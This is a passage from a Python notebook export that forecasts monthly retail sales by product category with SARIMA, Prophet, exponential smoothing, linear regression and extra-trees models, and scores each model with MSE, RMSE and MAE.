squared error (RMSE)\nrmse_sa_df = np.sqrt(mse_sa_df)\n\nprint(\"The Mean Squared Error of our forecasts is {}\".format(mse_sa_df))\nprint(\"The Root Mean Squared Error of our forecasts is {}\".format(rmse_sa_df))\n\n\n# In[163]:\n\n\npred_uc = results.get_forecast(steps=100)\npred_ci = pred_uc.conf_int()\nax = y_drinks_and_food.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_ylim([300, 600])\nax.set_xlabel('Date')\nax.set_ylabel(' Sales')\nplt.legend()\nplt.show()\n\n\n# ## Fast Moving Consumer Goods\n\n# In[164]:\n\n\ny_fast_moving_consumer_goods.skew()\n\n\n# In[165]:\n\n\n#checking stationarity\n\n\n# In[166]:\n\n\nadf_test1(y_fast_moving_consumer_goods)\n\n\n# In[167]:\n\n\nimport itertools\nimport statsmodels.api as sm\n\np = q = range(0, 2)\nd = [1] # Fixing d to One\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\n\nlowest_aic = float('inf')\nbest_pdq = None\nbest_seasonal_pdq = None\n\nfor param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y_fast_moving_consumer_goods,\n order=param,\n seasonal_order=param_seasonal,\n #enforce_stationarity=False,\n enforce_invertibility=False)\n\n results = mod.fit()\n \n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print('ARIMA{}x{}12 - AIC: {}'.format(param, param_seasonal, results.aic))\n\n except:\n continue\n\nprint(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n\n# In[168]:\n\n\nmod = sm.tsa.statespace.SARIMAX(y_fast_moving_consumer_goods,\n order=best_pdq,\n seasonal_order=best_seasonal_pdq,\n #enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\n\n\nresults = mod.fit()\nprint (results.summary().tables[1]) \nresults.plot_diagnostics (figsize=(16, 8)) \nplt.show()\n\n\n# In[169]:\n\n\npred=results.get_prediction (start='2013-07-01', dynamic=False)\n\npred_ci = pred.conf_int()\n\nax=y_fast_moving_consumer_goods[ '2012':].plot(label='observed')\n\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n\nax.set_xlabel('Date')\n\nax.set_ylabel('fast moving consumer goods Sales')\n\nplt.legend()\n\nplt.show()\n\n\n# In[170]:\n\n\ny_forecasted_fmcg=pred.predicted_mean\n\ny_truth_fmcg = y_fast_moving_consumer_goods[ '2013-07-01':]\n\nSA_errors_fmcg = pd.DataFrame(index=y_truth_fmcg.index)\nSA_errors_fmcg['Modelname'] = 'SARIMA'\nSA_errors_fmcg['Actual'] = y_truth_fmcg\nSA_errors_fmcg['Predicted'] = y_forecasted_fmcg\nSA_errors_fmcg['Error'] = y_forecasted_fmcg - y_truth_fmcg\nSA_errors_fmcg.head()\n\nmse_sa_fmcg = ((y_forecasted_fmcg - y_truth_fmcg) ** 2).mean()\n\n# Calculate the mean absolute error (MAE)\nmae_sa_fmcg = mean_absolute_error(y_truth_fmcg, y_forecasted_fmcg)\n\n# Calculate the mean squared error (MSE)\nmse_sa_fmcg = mean_squared_error(y_truth_fmcg, y_forecasted_fmcg)\n# Calculate the root mean squared error (RMSE)\nrmse_sa_fmcg = np.sqrt(mse_sa_fmcg)\n\nprint(\"The Mean Squared Error of our forecasts is {}\".format(mse_sa_fmcg))\nprint(\"The Root Mean Squared Error of our forecasts is {}\".format(rmse_sa_fmcg))\n\n\n# In[171]:\n\n\npred_uc = results.get_forecast(steps=100)\npred_ci = pred_uc.conf_int()\nax = y_fast_moving_consumer_goods.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_ylim([-100, 300])\nax.set_xlabel('Date')\nax.set_ylabel(' Sales')\nplt.legend()\nplt.show()\n\n\n# ## Others\n\n# In[172]:\n\n\ny_others.skew()\n\n\n# In[173]:\n\n\n#Checking stationarity\nadf_test1(y_others)\n\n\n# In[174]:\n\n\nimport itertools\nimport statsmodels.api as sm\n\np = q = range(0, 2)\nd = [1] # Fixing d to One\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\n\nlowest_aic = float('inf')\nbest_pdq = None\nbest_seasonal_pdq = None\n\nfor param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y_others,\n order=param,\n seasonal_order=param_seasonal,\n #enforce_stationarity=False,\n enforce_invertibility=False)\n\n results = mod.fit()\n \n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print('ARIMA{}x{}12 - AIC: {}'.format(param, param_seasonal, results.aic))\n\n except:\n continue\n\nprint(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n\n# In[175]:\n\n\nmod = sm.tsa.statespace.SARIMAX(y_others,\n order=best_pdq,\n seasonal_order=best_seasonal_pdq,\n #enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\n\n\nresults = mod.fit()\nprint (results.summary().tables[1]) \nresults.plot_diagnostics (figsize=(16, 8)) \nplt.show()\n\n\n# In[176]:\n\n\npred=results.get_prediction (start='2013-07-01', dynamic=False)\n\npred_ci = pred.conf_int()\n\nax=y_others[ '2012':].plot(label='observed')\n\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n\nax.set_xlabel('Date')\n\nax.set_ylabel('others Sales')\n\nplt.legend()\n\nplt.show()\n\n\n# In[177]:\n\n\ny_forecasted_others=pred.predicted_mean\n\ny_truth_others = y_others[ '2013-07-01':]\n\nSA_errors_others = pd.DataFrame(index=y_truth_others.index)\nSA_errors_others['Modelname'] = 'SARIMA'\nSA_errors_others['Actual'] = y_truth_others\nSA_errors_others['Predicted'] = y_forecasted_others\nSA_errors_others['Error'] = y_forecasted_others - y_truth_others\nSA_errors_others.head()\n\nmse_sa_others = ((y_forecasted_others - y_truth_others) ** 2).mean()\n\n# Calculate the mean absolute error (MAE)\nmae_sa_others = mean_absolute_error(y_truth_others, y_forecasted_others)\n\n# Calculate the mean squared error (MSE)\nmse_sa_others = mean_squared_error(y_truth_others, y_forecasted_others)\n# Calculate the root mean squared error (RMSE)\nrmse_sa_others = np.sqrt(mse_sa_others)\n\nprint(\"The Mean Squared Error of our forecasts is {}\".format(mse_sa_others))\nprint(\"The Root Mean Squared Error of our forecasts is {}\".format(rmse_sa_others))\n\n\n# In[178]:\n\n\npred_uc = results.get_forecast(steps=100)\npred_ci = pred_uc.conf_int()\nax = y_others.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_ylim([-50, 50])\nax.set_xlabel('Date')\nax.set_ylabel(' Sales')\nplt.legend()\nplt.show()\n\n\n# # ---------------------------------------------------------------------------------------\n\n# # Time series modelling with prophet\n\n# In[179]:\n\n\nget_ipython().system('pip install prophet')\n\n\n# In[180]:\n\n\nimport pandas as pd\nfrom prophet.plot import plot_plotly, plot_components_plotly\nfrom prophet import Prophet\n\n\n# ## Product wise-Prophet\n\n# In[181]:\n\n\ntrain_pro = sales_monthly.iloc[:]\n#add 20 if need to do evaluation\n\n\n# In[182]:\n\n\nfor col in sales_monthly:\n print(f'\\nPROPHET method for {col}\\n')\n\n y_df = train_pro.loc[:, [col]]\n y_df['ds'] = y_df.index\n y_df.columns = ['y', 'ds']\n\n m_y = Prophet()\n m_y.fit(y_df)\n\n future_y = m_y.make_future_dataframe(periods=12, freq='MS')\n\n forecast_y = m_y.predict(future_y)\n\n forecast_y[['ds', 'yhat_lower', 'yhat_upper', 'yhat']]\n\n plt.figure()\n m_y.plot(forecast_y)\n plt.title(f'Sales of {col}')\n plt.xlabel('Years')\n plt.ylabel('Sales')\n\n plt.figure()\n plot_plotly(m_y, forecast_y)\n\n plt.figure(figsize=(12, 5))\n forecast_y.plot(x='ds', y='yhat')\n plt.show()\n\n plt.figure()\n m_y.plot_components(forecast_y)\n\n plt.figure()\n plot_components_plotly(m_y, forecast_y)\n\n\n# In[183]:\n\n\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\nprophet_data = pd.DataFrame(columns=['Product Identifier', 'MSE_p', 'RMSE_p','MAE_p'])\nfor col in sales_monthly:\n print(f'\\nPROPHET method for {col}\\n')\n\n y_df = train_pro.loc[:, [col]]\n y_df['ds'] = y_df.index\n y_df.columns = ['y', 'ds']\n\n m_y = Prophet()\n m_y.fit(y_df)\n\n future_y = m_y.make_future_dataframe(periods=12, freq='MS')\n\n forecast_y = m_y.predict(future_y)\n\n forecast_y[['ds', 'yhat_lower', 'yhat_upper', 'yhat']]\n\n # Calculate MSE and RMSE\n actual_values = y_df['y'].values\n predicted_values = forecast_y.loc[:len(actual_values)-1, 'yhat'].values\n mse = mean_squared_error(actual_values, predicted_values)\n rmse = np.sqrt(mse)\n mae= mean_absolute_error(actual_values,predicted_values)\n \n prophet_data = prophet_data.append({'Product Identifier': col, 'MSE_p': mse, 'RMSE_p': rmse,'MAE_p': mae}, ignore_index=True)\n\n # Rest of the code...\n \n prophet_data.drop_duplicates(subset='Product Identifier', inplace=True)\n #prophet_data=prophet_data[1:]\n\n\n# In[184]:\n\n\n#prophet_data.drop(0, inplace=True)\nprophet_data\n\n\n# # -----------------------------------------------------------------------------------------------\n\n# # Category Wise Modelling\n\n# ## Drinks and Food\n\n# In[185]:\n\n\ny_drinks_and_food_df = y_drinks_and_food.to_frame()\ny_drinks_and_food_df['ds'] = y_drinks_and_food_df.index\ny_drinks_and_food_df.columns = ['y','ds']\ny_drinks_and_food_df\n\n\n# In[186]:\n\n\ny_drinks_and_food_df.info()\n\n\n# In[187]:\n\n\nm_drinks_and_food = Prophet()\nm_drinks_and_food.fit(y_drinks_and_food_df)\n\n\n# In[188]:\n\n\nfuture_drinks_and_food = m_drinks_and_food.make_future_dataframe(periods=24,freq='MS')\nfuture_drinks_and_food\n\n\n# In[189]:\n\n\nforecast_drinks_and_food = m_drinks_and_food.predict(future_drinks_and_food)\nforecast_drinks_and_food\n\n\n# In[190]:\n\n\nforecast_drinks_and_food.columns\n\n\n# In[191]:\n\n\nforecast_drinks_and_food[['ds','yhat_lower', 'yhat_upper','yhat']].tail(12)\n\n\n# In[194]:\n\n\ny_drinks_and_food\n\n\n# In[195]:\n\n\nactual_values_df = y_drinks_and_food_df['y'].values\npredicted_values_df = forecast_drinks_and_food.loc[:len(actual_values_df)-1, 'yhat'].values\n\npr_errors_df = pd.DataFrame(index=np.arange(len(actual_values_df)))\npr_errors_df['Modelname'] = 'Prophet'\npr_errors_df['Actual'] = actual_values_df\npr_errors_df['Predicted'] = predicted_values_df\npr_errors_df['Error'] = predicted_values_df - actual_values_df\n\n# Calculate the mean squared error (MSE)\nmse_pr_df = mean_squared_error(actual_values_df, predicted_values_df)\n\n# Calculate the mean absolute error (MAE)\nmae_pr_df = mean_absolute_error(actual_values_df, predicted_values_df)\n\n# Calculate the root mean squared error (RMSE)\nrmse_pr_df = np.sqrt(mse_pr_df)\n\n\n# In[196]:\n\n\nm_drinks_and_food.plot(forecast_drinks_and_food);\nplt.title('Sales of drinks_and_food')\nplt.xlabel('Years')\nplt.ylabel('Sales')\n\n\n# In[197]:\n\n\nfrom prophet.plot import plot_plotly, plot_components_plotly\nplot_plotly(m_drinks_and_food, forecast_drinks_and_food)\nforecast_drinks_and_food.plot(x='ds',y='yhat',figsize=(12,5))\n\n\n# In[198]:\n\n\nm_drinks_and_food.plot_components(forecast_drinks_and_food);\n\n\n# In[199]:\n\n\nplot_components_plotly(m_drinks_and_food , forecast_drinks_and_food)\n\n\n# ## Fast Moving Consumer Goods\n\n# In[200]:\n\n\ny_fast_moving_consumer_goods_df = y_fast_moving_consumer_goods.to_frame()\ny_fast_moving_consumer_goods_df['ds'] = y_fast_moving_consumer_goods_df.index\ny_fast_moving_consumer_goods_df.columns = ['y','ds']\ny_fast_moving_consumer_goods_df\n\n\n# In[201]:\n\n\ny_fast_moving_consumer_goods_df.info()\n\n\n# In[202]:\n\n\nm_fast_moving_consumer_goods = Prophet()\nm_fast_moving_consumer_goods.fit(y_fast_moving_consumer_goods_df)\n\n\n# In[203]:\n\n\nfuture_fast_moving_consumer_goods = m_fast_moving_consumer_goods.make_future_dataframe(periods=24,freq='MS')\nfuture_fast_moving_consumer_goods\n\n\n# In[204]:\n\n\nforecast_fast_moving_consumer_goods = m_fast_moving_consumer_goods.predict(future_fast_moving_consumer_goods)\nforecast_fast_moving_consumer_goods\n\n\n# In[205]:\n\n\nforecast_fast_moving_consumer_goods.columns\n\n\n# In[206]:\n\n\nforecast_fast_moving_consumer_goods[['ds','yhat_lower', 'yhat_upper','yhat']].tail(12)\n\n\n# In[207]:\n\n\nactual_values_fmcg = y_fast_moving_consumer_goods_df['y'].values\npredicted_values_fmcg = forecast_fast_moving_consumer_goods.loc[:len(actual_values_fmcg)-1, 'yhat'].values\n\npr_errors_fmcg = pd.DataFrame(index=np.arange(len(actual_values_fmcg)))\npr_errors_fmcg['Modelname'] = 'Prophet'\npr_errors_fmcg['Actual'] = actual_values_fmcg\npr_errors_fmcg['Predicted'] = predicted_values_fmcg\npr_errors_fmcg['Error'] = predicted_values_fmcg - actual_values_fmcg\n\n# Calculate the mean squared error (MSE)\nmse_pr_fmcg = mean_squared_error(actual_values_fmcg, predicted_values_fmcg)\n\n# Calculate the mean absolute error (MAE)\nmae_pr_fmcg = mean_absolute_error(actual_values_fmcg, predicted_values_fmcg)\n\n# Calculate the root mean squared error (RMSE)\nrmse_pr_fmcg = np.sqrt(mse_pr_fmcg)\n\n\n# In[208]:\n\n\nm_fast_moving_consumer_goods.plot(forecast_fast_moving_consumer_goods);\nplt.title('Sales of fast_moving_consumer_goods')\nplt.xlabel('Years')\nplt.ylabel('Sales')\n\n\n# In[209]:\n\n\nfrom prophet.plot import plot_plotly, plot_components_plotly\nplot_plotly(m_fast_moving_consumer_goods, forecast_fast_moving_consumer_goods)\nforecast_fast_moving_consumer_goods.plot(x='ds',y='yhat',figsize=(12,5))\n\n\n# In[210]:\n\n\nm_fast_moving_consumer_goods.plot_components(forecast_fast_moving_consumer_goods);\n\n\n# In[211]:\n\n\nplot_components_plotly(m_fast_moving_consumer_goods , forecast_fast_moving_consumer_goods)\n\n\n# ## Others\n\n# In[212]:\n\n\ny_others_df = y_others.to_frame()\ny_others_df['ds'] = y_others_df.index\ny_others_df.columns = ['y','ds']\ny_others_df\n\n\n# In[213]:\n\n\ny_others_df.info()\n\n\n# In[214]:\n\n\nm_others = Prophet()\nm_others.fit(y_others_df)\n\n\n# In[215]:\n\n\nfuture_others = m_others.make_future_dataframe(periods=24,freq='MS')\nfuture_others\n\n\n# In[216]:\n\n\nforecast_others = m_others.predict(future_others)\nforecast_others\n\n\n# In[217]:\n\n\nforecast_others.columns\n\n\n# In[218]:\n\n\nforecast_others[['ds','yhat_lower', 'yhat_upper','yhat']].tail(12)\n\n\n# In[219]:\n\n\nactual_values_others = y_others_df['y'].values\npredicted_values_others= forecast_others.loc[:len(actual_values_others)-1, 'yhat'].values\n\npr_errors_others = pd.DataFrame(index=np.arange(len(actual_values_others)))\npr_errors_others['Modelname'] = 'Prophet'\npr_errors_others['Actual'] = actual_values_others\npr_errors_others['Predicted'] = predicted_values_others\npr_errors_others['Error'] = predicted_values_others - actual_values_others\n\n# Calculate the mean squared error (MSE)\nmse_pr_others = mean_squared_error(actual_values_others, predicted_values_others)\n\n# Calculate the mean absolute error (MAE)\nmae_pr_others= mean_absolute_error(actual_values_others, predicted_values_others)\n\n# Calculate the root mean squared error (RMSE)\nrmse_pr_others = np.sqrt(mse_pr_others)\n\n\n# In[220]:\n\n\nm_others.plot(forecast_others);\nplt.title('Sales of others')\nplt.xlabel('Years')\nplt.ylabel('Sales')\n\n\n# In[221]:\n\n\nfrom prophet.plot import plot_plotly, plot_components_plotly\nplot_plotly(m_others, forecast_others)\nforecast_others.plot(x='ds',y='yhat',figsize=(12,5))\n\n\n# In[222]:\n\n\nm_others.plot_components(forecast_others);\n\n\n# In[223]:\n\n\nplot_components_plotly(m_others , forecast_others)\n\n\n# # ---------------------------------------------------------------------------------------\n\n# NOTE: simple exponential smoothing is not suitable for seasonal data.So we didn't use it and Triple exponential smoothing need Minimum 24 data entries we only have 25 so we drop it.\n\n# # Double-Exponential Smoothing\n\n# ## Product Wise Modelling\n\n# ###### Spliting data (Train=80%, Test= 20%)\n\n# In[224]:\n\n\n# Split the time series data (Train-20, Test-6)\n#retail_data = retail_data.set_index('StartDate')\nprint('Total records in dataset:', len(sales_monthly))\nsales_train = sales_monthly.iloc[0:20] \nsales_test = sales_monthly.iloc[20:]\n\nsales_pred_train = sales_monthly.iloc[0:20] \nsales_pred_test = sales_monthly.iloc[20:]\nprint('Total records in Training set:', len(sales_train))\nprint('Total records in Test set:', len(sales_test))\n\n\n# ###### Plot Train and Test data\n\n# In[225]:\n\n\nimport matplotlib.pyplot as plt\n\nfor col in sales_monthly:\n sales_train[col].plot(legend=True, label='TRAIN (80%)')\n sales_test[col].plot(legend=True, label='TEST (20%)', figsize=(12, 8))\n plt.title(f'Sales of {col}')\n plt.xlabel('Index')\n plt.ylabel('Sales')\n plt.legend()\n plt.show()\n\n\n# In[226]:\n\n\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\n\nfor col in sales_train:\n double_model = ExponentialSmoothing(sales_train[col], trend='add').fit()\n doublemodel_preds = double_model.forecast(6).rename('DES Forecast')\n \n # Print the forecasted values\n print(f'\\nDouble Exponential Smoothing (DES) forecast for {col}:\\n')\n #print(doublemodel_preds)\n\n des_errors_df = sales_test[[col]].copy()\n des_errors_df['Predicted_sales'] = doublemodel_preds\n des_errors_df['Error'] = doublemodel_preds - sales_test[col]\n des_errors_df.insert(0, 'Modelname', 'Holtman-DES')\n #print(f'\\nDES Errors for {col}:\\n')\n #print(des_errors_df.head())\n\n\n# Evaluate predictions for Holt Winters-Double Exponential Smoothing\n fig = plt.figure(figsize=(14,7))\n plt.plot(sales_train.index, sales_train[col], label='Train')\n plt.plot(sales_test.index, sales_test[col], label='Test')\n plt.plot(des_errors_df.index, des_errors_df['Predicted_sales'], label='Forecast - HW-DES')\n plt.legend(loc='best')\n plt.xlabel('StartDate')\n plt.ylabel('sales')\n plt.title('Forecast using Holt Winters-Double Exponential Smoothing')\n plt.show()\n\n\n# In[227]:\n\n\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\ndes_data = pd.DataFrame(columns=['Product Identifier', 'MSE_d', 'RMSE_d', 'MAE_d'])\nfor col in sales_train:\n double_model = ExponentialSmoothing(sales_train[col], trend='add').fit()\n doublemodel_preds = double_model.forecast(6).rename('DES Forecast')\n \n \n mse=mean_squared_error(doublemodel_preds,sales_test[col])\n rmse=np.sqrt(mse)\n mae=mean_absolute_error(doublemodel_preds,sales_test[col])\n \n des_data = des_data.append({'Product Identifier': col, 'MSE_d': mse, 'RMSE_d': rmse, 'MAE_d': mae},ignore_index=True)\n\n\n# In[228]:\n\n\ndes_data\n\n\n# ## ==================================================\n\n# # Category Wise Modelling\n\n# # Splitting Dataset\n\n# In[229]:\n\n\ndrinks_and_food_x = drinks_and_food_en.drop(['sales','sell_price','week_id','year','month','day'],axis=1)\nfast_moving_consumer_goods_x = fast_moving_consumer_goods_en.drop(['sales','sell_price','week_id','year','month','day'],axis=1)\nothers_x=others_en.drop(['sales','sell_price','week_id','year','month','day'],axis=1)\n\n\n# In[230]:\n\n\ndrinks_and_food_y = drinks_and_food_en['sales']\nfast_moving_consumer_goods_y = fast_moving_consumer_goods_en['sales']\nothers_y=others_en['sales']\n\n\n# In[231]:\n\n\nx_train_df = drinks_and_food_x.iloc[:107440]\nx_test_df = drinks_and_food_x.iloc[107440:]\ny_train_df = drinks_and_food_y.iloc[:107440]\ny_test_df = drinks_and_food_y.iloc[107440:]\n\n\n# In[232]:\n\n\nx_train_fmcg = fast_moving_consumer_goods_x.iloc[:183280]\nx_test_fmcg = fast_moving_consumer_goods_x.iloc[183280:]\ny_train_fmcg = fast_moving_consumer_goods_y.iloc[:183280]\ny_test_fmcg = fast_moving_consumer_goods_y.iloc[183280:]\n\n\n# In[233]:\n\n\nx_train_others = others_x.iloc[:25280]\nx_test_others = others_x.iloc[25280:]\ny_train_others = others_y.iloc[:25280]\ny_test_others = others_y.iloc[25280:]\n\n\n# # --------------------------------------------------------------------------------\n\n# # Linear regression\n\n# ## Drinks and food\n\n# In[234]:\n\n\nfrom sklearn.linear_model import LinearRegression\nlr_model = LinearRegression()\nlr_model.fit(x_train_df, y_train_df)\n\nlr_preds1 = lr_model.predict(x_test_df)\n\n\n# In[235]:\n\n\nlr_errors_df = pd.DataFrame(index=y_test_df.index)\nlr_errors_df['Modelname'] = 'Linear Regression'\nlr_errors_df['Actual'] = y_test_df\nlr_errors_df['Predicted'] = lr_preds1\nlr_errors_df['Error'] = lr_preds1 - y_test_df\nlr_errors_df.head()\n\n\n# In[236]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_lr_df = mean_absolute_error(y_test_df, lr_preds1)\n\n# Calculate the mean squared error (MSE)\nmse_lr_df = mean_squared_error(y_test_df, lr_preds1)\n# Calculate the root mean squared error (RMSE)\nrmse_lr_df = np.sqrt(mse_lr_df)\n\n\n# In[237]:\n\n\ny_train_df1 = y_train_df.resample('M').mean()\n\nlr_errors_df1 = lr_errors_df.resample('M').mean()\n\n# Convert the index to datetime\ny_test_df1=y_test_df.copy()\ny_test_df1.index = pd.to_datetime(y_test_df1.index)\n\n# Resample the Series based on month\ny_test_df1 = y_test_df1.resample('M').mean()\n\n\n# In[238]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_df1.index, y_train_df1, label='Train',linewidth=3)\nplt.plot(y_test_df1.index, y_test_df1, label='Test',linewidth=3)\nplt.plot(lr_errors_df1.index, lr_errors_df1['Predicted'], label='Forecast - Linear Regression',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Linear Regression')\nplt.show()\n\n\n# In[239]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(lr_errors_df1.index, lr_errors_df1.Error, label='Error',linewidth=3)\nplt.plot(lr_errors_df1.index, lr_errors_df1.Actual, label='Actual Sales',linewidth=3)\nplt.plot(lr_errors_df1.index, lr_errors_df1.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Linear Regression Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# ## Fast Moving Consumer Goods\n\n# In[240]:\n\n\nfrom sklearn.linear_model import LinearRegression\nlr_model = LinearRegression()\nlr_model.fit(x_train_fmcg, y_train_fmcg)\n\nlr_preds2 = lr_model.predict(x_test_fmcg)\n\n\n# In[241]:\n\n\nlr_errors_fmcg = pd.DataFrame(index=y_test_fmcg.index)\nlr_errors_fmcg['Modelname'] = 'Linear Regression'\nlr_errors_fmcg['Actual'] = y_test_fmcg\nlr_errors_fmcg['Predicted'] = lr_preds2\nlr_errors_fmcg['Error'] = lr_preds2 - y_test_fmcg\nlr_errors_fmcg.head()\n\n\n# In[242]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_lr_fmcg = mean_absolute_error(y_test_fmcg, lr_preds2)\n\n# Calculate the mean squared error (MSE)\nmse_lr_fmcg = mean_squared_error(y_test_fmcg, lr_preds2)\n# Calculate the root mean squared error (RMSE)\nrmse_lr_fmcg = np.sqrt(mse_lr_fmcg)\n\n\n# ## Plotting\n\n# In[243]:\n\n\ny_train_fmcg1 = y_train_fmcg.resample('M').mean()\n\nlr_errors_fmcg1 = lr_errors_fmcg.resample('M').mean()\n\n# Convert the index to datetime\ny_test_fmcg1=y_test_fmcg.copy()\ny_test_fmcg1.index = pd.to_datetime(y_test_fmcg1.index)\n\n# Resample the Series based on month\ny_test_fmcg1 = y_test_fmcg1.resample('M').mean()\n\n\n# In[244]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_fmcg1.index, y_train_fmcg1, label='Train',linewidth=3)\nplt.plot(y_test_fmcg1.index, y_test_fmcg1, label='Test',linewidth=3)\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1['Predicted'], label='Forecast - Linear Regression',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Linear Regression')\nplt.show()\n\n\n# In[245]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1.Error, label='Error',linewidth=3)\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1.Actual, label='Actual Sales',linewidth=3)\nplt.plot(lr_errors_fmcg1.index, lr_errors_fmcg1.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Linear Regression Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Others\n\n# In[246]:\n\n\nfrom sklearn.linear_model import LinearRegression\nlr_model = LinearRegression()\nlr_model.fit(x_train_others, y_train_others)\n\nlr_preds3 = lr_model.predict(x_test_others)\n\n\n# In[247]:\n\n\nlr_errors_others = pd.DataFrame(index=y_test_others.index)\nlr_errors_others['Modelname'] = 'Linear Regression'\nlr_errors_others['Actual'] = y_test_others\nlr_errors_others['Predicted'] = lr_preds3\nlr_errors_others['Error'] = lr_preds3 - y_test_others\nlr_errors_others.head()\n\n\n# In[248]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_lr_others = mean_absolute_error(y_test_others, lr_preds3)\n\n# Calculate the mean squared error (MSE)\nmse_lr_others = mean_squared_error(y_test_others, lr_preds3)\n\n# Calculate the root mean squared error (RMSE)\nrmse_lr_others = np.sqrt(mse_lr_others)\n\n\n# ## Plotting\n\n# In[249]:\n\n\ny_train_others1 = y_train_others.resample('M').mean()\n\nlr_errors_others1 = lr_errors_others.resample('M').mean()\n\n# Convert the index to datetime\ny_test_others1=y_test_others.copy()\ny_test_others1.index = pd.to_datetime(y_test_others1.index)\n\n# Resample the Series based on month\ny_test_others1 = y_test_others1.resample('M').mean()\n\n\n# In[250]:\n\n\n# Evaluate predictions for Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_others1.index, y_train_others1, label='Train',linewidth=3)\nplt.plot(y_test_others1.index, y_test_others1, label='Test',linewidth=3)\nplt.plot(lr_errors_others1.index, lr_errors_others1['Predicted'], label='Forecast - Linear Regression',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Linear Regression')\nplt.show()\n\n\n# In[251]:\n\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(lr_errors_others1.index, lr_errors_others1.Error, label='Error',linewidth=3)\nplt.plot(lr_errors_others1.index, lr_errors_others1.Actual, label='Actual Sales',linewidth=3)\nplt.plot(lr_errors_others1.index, lr_errors_others1.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Linear Regression Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # ---------------------------------------------------------------------------\n\n# # Extra Tree Regressor\n\n# In[252]:\n\n\nfrom sklearn.ensemble import ExtraTreesRegressor\n\n\n# ## Drinks and Food\n\n# In[253]:\n\n\n# fit model\netr_model = ExtraTreesRegressor(n_estimators=100)\netr_model.fit(x_train_df, y_train_df)\n\netr_preds1 = etr_model.predict(x_test_df)\nprint('Prediction is done..')\n\n\n# In[254]:\n\n\netr_errors_df = pd.DataFrame(index=y_test_df.index)\netr_errors_df['Modelname'] = 'Extra Trees Regressor'\netr_errors_df['Actual'] = y_test_df\netr_errors_df['Predicted'] = etr_preds1\netr_errors_df['Error'] = etr_preds1 - y_test_df\netr_errors_df.head()\n\n\n# In[255]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_etr_df = mean_absolute_error(y_test_df, etr_preds1)\n\n# Calculate the mean squared error (MSE)\nmse_etr_df = mean_squared_error(y_test_df, etr_preds1)\n# Calculate the root mean squared error (RMSE)\nrmse_etr_df = np.sqrt(mse_etr_df)\n\n\n# In[256]:\n\n\ny_train_df2 = y_train_df.resample('M').mean()\n\netr_errors_df2 = etr_errors_df.resample('M').mean()\n\n# Convert the index to datetime\ny_test_df2=y_test_df.copy()\ny_test_df2.index = pd.to_datetime(y_test_df2.index)\n\n# Resample the Series based on month\ny_test_df2 = y_test_df2.resample('M').mean()\n\n\n# In[257]:\n\n\n# Evaluate predictions for Extra Tree Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_df2.index, y_train_df2, 